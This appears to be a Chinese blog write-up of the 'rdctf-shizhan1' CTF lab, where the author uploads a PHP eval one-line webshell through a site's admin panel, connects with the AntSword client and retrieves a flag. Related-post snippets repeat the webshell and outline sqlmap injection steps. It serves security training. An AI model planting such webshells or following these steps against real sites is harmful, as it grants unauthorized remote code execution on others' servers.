rdctf-shizhan1

最新推荐文章于 2024-08-21 09:58:02 发布
原创 最新推荐文章于 2024-08-21 09:58:02 发布 · 122 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一次使用SQLMap进行渗透测试的过程,详细讲述了如何利用该工具发现并利用SQL注入漏洞,进一步通过上传WebShell文件获得目标系统权限。文中还分享了如何在目标网站上传并激活WebShell,最终获取敏感信息,包括flag。

  • 接到上次的sqlmap接着攻击这个靶机

上次的前面部分

  • 进入后台上传木马文件

<?php @eval($_POST['shell']);?>

  • 将这个放入webshell.php文本中

  • 找到文件上传地方将webshell.php上传到文件

在这里插入图片描述

  • 上传文件

在这里插入图片描述

  • 上传成功

在这里插入图片描述

  • 点开这个文件

在这里插入图片描述

  • 得到网址之后将网址复制到蚁剑中

在这里插入图片描述
在这里插入图片描述

  • 完成后拿到网址权限拿到flag

在这里插入图片描述

  • 找到这个flag发现提交后是错误的所以flag另在其他的位置

在这里插入图片描述

  • 找了很久发现flag原来在这!!!

在这里插入图片描述

flag{23b612ba-89ae-4886-a54f-775d54bdcf74}
haozhu945
关注
rdctf-shizhan1借助蚁剑注入木马找到flag
qq_45970858的博客
09-14 1853
rdctf-shizhan1 进入实战页面 复制链接打开新的页面,在后面输入admins/进入后台管理员页面 找到可以上传文件的地方,例如附件管理,上传文件 此时先需要把php开启 点击网站,打开根目录 点击新建,创建新的php文档 (一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然
cocos2d-x游戏开发基础与实战 经典视频教程
热门推荐
fengliaoai的博客
04-29 1万+
cocos2d-x游戏开发基础与实战 经典视频教程 cocos2d-x游戏开发工资高吗? 精通C/C++,熟练掌握Cocos2d-x引擎及其Cocos2d-x引擎周边开发工具,了解游戏开发常用的工具和软件,精通Socket网络编程和HTTP协议,能高效的处理各种数据. 开发过一款以上的知名商业化移动游戏产品的话,工资月薪起码在3万以上! cocos2d-x游戏开发需要学什么? 第一部分cocos2...
rdctf-shizhan1(文件上传漏洞)
qq_50647304的博客
09-15 263
接文章SQLMap实战——RDCTF靶机训练 在后台上传木马文件 在桌面新建一个文本文档,写入一句话木马,将后缀改为.php。
RDCTF SHIZHAN1
sweetie 的博客
09-14 239
RDCTF SHIZHAN1 拿到题目进入网站 加上robots.txt 按照提示加上/admins/ 登入之前拿到的密码 进入网站后台 寻找注入点 点击附件管理 上传附件 文件内容(一句话木马) 找到刚刚上传的软件 点击在新窗口打开 得到url 打开蚁剑 链接 看代码表示flag在home文件夹里面 双击flag 成功! ...
RDCTF shizhan1(靶机)
qq_50646540的博客
09-15 232
进入网页后台之后, 先编写一个含有木马的文件,可以用文本文档编写,之后将后缀名改为.php 木马内容:<?php @eval($_POST['11']);?> 登录进网站后台之后,将小木马上传进网站
sqlmap-靶机shizhan1登录软件学院
qq_50650027的博客
09-12 304
打开靶机页面 寻找注入点 点开文章发现有传参有可能是注入点 使用and 1=1 和 and 1=2 进行判断 在1=1时页面没有发生变化 在1=2时页面出现了报错 判断出是一个注入点 可以使用sqlmap进行注入 进入sqlmap sqlmap.py -u [注入点] 查看当前的数据库的版本信息 可以看出是MySql数据库版本大于5.0.12接下来查看数据库 sqlmap.py -u [注入点] --dbs 有六个数据库,我们需要获得软件学院的密码我们进入rjxy查看这个数据库中的表名 sqlmap
探索Node.js实战:MiYogurt的`nodejs-shizhan`项目详解
gitblog_00024的博客
03-27 393
探索Node.js实战:MiYogurt的nodejs-shizhan项目详解 去发现同类优质开源项目:https://gitcode.com/ 项目简介 在开发Web应用的过程中,快速上手和实践是提升技能的关键步骤。就是一个专为初学者和开发者设计的Node.js实战平台。它提供了丰富的练习案例和教程,旨在帮助你深入理解并熟练掌握Node.js的核心技术和实践应用。 技术分析 nodejs-shi...
tensorflow shizhan
yuehanliushuang的博客
03-16 563
import tensorflow as tf import numpy as np x=np.random.rand(100).astype("float32") y=x*0.1+0.3 w=tf.Variable(tf.random_uniform([1],-1.0,1.0)) b=tf.Variable(tf.zeros([1])) yy=w*x+b loss=tf.reduc
MiniProgram-DouyinParse 使用教程
gitblog_00156的博客
08-21 610
MiniProgram-DouyinParse 使用教程 项目介绍 MiniProgram-DouyinParse 是一个用于解析抖音视频链接的开源项目。该项目主要功能是提取抖音视频的原始视频地址,方便开发者在自己的小程序或应用中嵌入抖音视频。该项目使用简单,接口清晰,适合需要集成抖音视频解析功能的开发者使用。 项目快速启动 环境准备 在开始使用 MiniProgram-DouyinParse 之...
leadnews-shizhan-master.zip
11-10
《leadnews-shizhan-master.zip》是一个压缩包文件,其名称暗示了它可能与LeadNews(领闻)项目有关,而“shizhan”通常意味着“实战”或“实践”,这可能是一个实战训练项目或者一个实际操作的代码库。由于没有提供...
nodejs-shizhan:Node《 Node.js实战:使用Egg.js + Vue.js + Docker构建渐进式,可持续集成与交付应用》
03-23
分阶段创建你的互联网Web产品 计划 :clipboard: 设计 :scissors: 编码 :gear: 部署 :desktop_computer: 被删减章节请搜索NodeLover微信公众号进行阅读。
shizhan_03_hadoop
12-15
1. HDFS(Hadoop Distributed File System):Hadoop的核心组件之一,用于分布式存储数据。学习者将了解如何使用HDFS API进行文件的上传、下载和操作。 2. MapReduce:Hadoop的并行计算模型,包括Map阶段和Reduce...
77页-中国数字安全产业年度报告(2024)公开版 数世咨询 2024-6(1).pdf
11-26
77页-中国数字安全产业年度报告(2024)公开版 数世咨询 2024-6(1)
图像处理基于电磁学优化算法的多阈值分割算法研究(Matlab代码实现)
11-26
【图像处理】基于电磁学优化算法的多阈值分割算法研究(Matlab代码实现)内容概要:本文围绕“基于电磁学优化算法的多阈值分割算法研究”展开,结合Matlab代码实现,探讨了图像处理中的多阈值分割问题。通过引入电磁学优化算法(Electromagnetism-like Optimization, EMO),利用其全局搜索能力优化多阈值分割的阈值选取过程,以提升图像分割的精度与效率。文中详细阐述了算法原理、实现步骤,并通过实验验证其在图像分割中的有效性,展示了与其他智能优化算法的对比结果,突出了该方法在处理复杂图像时的优越性。; 适合人群:具备一定图像处理和优化算法基础,熟悉Matlab编程的研究生、科研人员及工程技术人员。; 使用场景及目标:①用于医学图像、遥感图像等复杂图像的多阈值分割任务;②为智能优化算法在图像处理领域的应用提供实现案例与技术参考;③支持科研复现与算法改进。; 阅读建议:建议结合Matlab代码逐段理解算法实现流程,重点关注目标函数设计与电磁力机制的映射关系,可通过更换测试图像和对比其他优化算法加深理解。
基于51单片机的电子琴设计
11-26
本资源文件“基于51单片机的电子琴设计.zip”对应于博客文章“基于51单片机设计的简易电子琴”。该资源包含了实现一个简易电子琴所需的全部文件和代码,适用于学习和实践51单片机的开发。 内容 源代码:包含电子琴的C语言源代码,可在Keil uVision等51单片机开发环境中编译运行。 原理图:提供了电子琴的电路设计原理图,方便用户理解硬件连接和布局。 PCB设计文件:如果需要自行制作PCB,资源中包含了PCB设计文件,可用于PCB打样。 说明文档:详细的使用说明和操作指南,帮助用户快速上手。 使用方法 下载资源:点击下载“基于51单片机的电子琴设计.zip”文件。 解压文件:将下载的ZIP文件解压到本地目录。 阅读说明文档:仔细阅读说明文档,了解项目的基本结构和使用方法。 搭建硬件:根据原理图搭建硬件电路。 编译代码:使用Keil uVision等开发工具打开源代码,进行编译。 烧录程序:将编译好的程序烧录到51单片机中。 测试运行:连接电源,测试电子琴的功能是否正常。
故障诊断pytorch基于CNN-LSTM故障分类的轴承故障诊断研究[西储大学数据](Python代码实现)
11-26
【故障诊断】【pytorch】基于CNN-LSTM故障分类的轴承故障诊断研究[西储大学数据](Python代码实现)内容概要:本文介绍了一项基于CNN-LSTM神经网络模型的轴承故障诊断研究,采用PyTorch框架实现,使用西储大学公开的轴承故障数据集进行实验验证。该方法结合卷积神经网络(CNN)强大的特征提取能力与长短期记忆网络(LSTM)对时序数据的建模优势,构建深度学习分类模型,实现对轴承不同故障类型和严重程度的精准识别与分类,旨在提升工业设备故障诊断的自动化与智能化水平。; 适合人群:具备Python编程基础和深度学习基础知识的高校学生、科研人员及工业界从事设备状态监测与故障诊断的工程师;熟悉PyTorch框架者更佳。; 使用场景及目标:①应用于工业设备预测性维护系统中的轴承故障早期识别;②作为深度学习在时间序列分类任务中的典型案例,用于学习CNN-LSTM融合模型的设计与实现;③复现并改进现有故障诊断算法,推动相关科研工作进展。; 阅读建议:建议读者结合提供的Python代码与西储大学数据集进行实践操作,重点关注数据预处理、模型结构搭建、训练流程及结果分析环节,可进一步尝试调整网络参数或引入其他优化算法以提升分类性能。
hanlp-portable-1.8.6 对应模型下载 data-for-1.7.5
11-26
hanlp-portable-1.8.6 对应模型下载 data-for-1.7.5
完整版-PID 恒流源控制
最新发布
11-26
提供了一份利用STM32单片机和PID算法实现恒流源控制的详细资源文件。该资源文件旨在帮助开发者更好地理解和应用PID控制算法,以实现高精度电流控制。 主要内容: STM32单片机程序代码 PID算法实现与应用 恒流源控制原理与实现 硬件电路设计与调试 使用说明 下载资源文件至本地电脑。 根据提供的代码和文档,理解并学习PID算法在恒流源控制中的应用。 根据个人需求,对代码进行适当修改和优化。 按照硬件电路设计,搭建实验平台,进行调试。 注意事项 请确保具备STM32单片机开发基础和PID控制算法相关知识。 调试过程中,务必遵循安全操作规范,确保实验安全。 如有任何问题,请查阅相关资料或向专业人士咨询。
毕业设计芳芯科技F. 基于单片机的智能车载系统
11-26
毕业设计芳芯科技F. 基于单片机的智能车载系统
open C:\Users\47198\Desktop\AI-agent\shizhan\DeepSeek + RAGFlow\ragflow-main\docker-compose.yml: The system cannot find the file specified.
07-03
确认提供的路径 `C:\Users\47198\Desktop\AI-agent\shizhan\DeepSeek + RAGFlow\ragflow-main\docker-compose.yml` 是否准确无误。注意路径中的空格和特殊字符是否被正确处理,例如路径中包含空格时应使用引号包裹...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值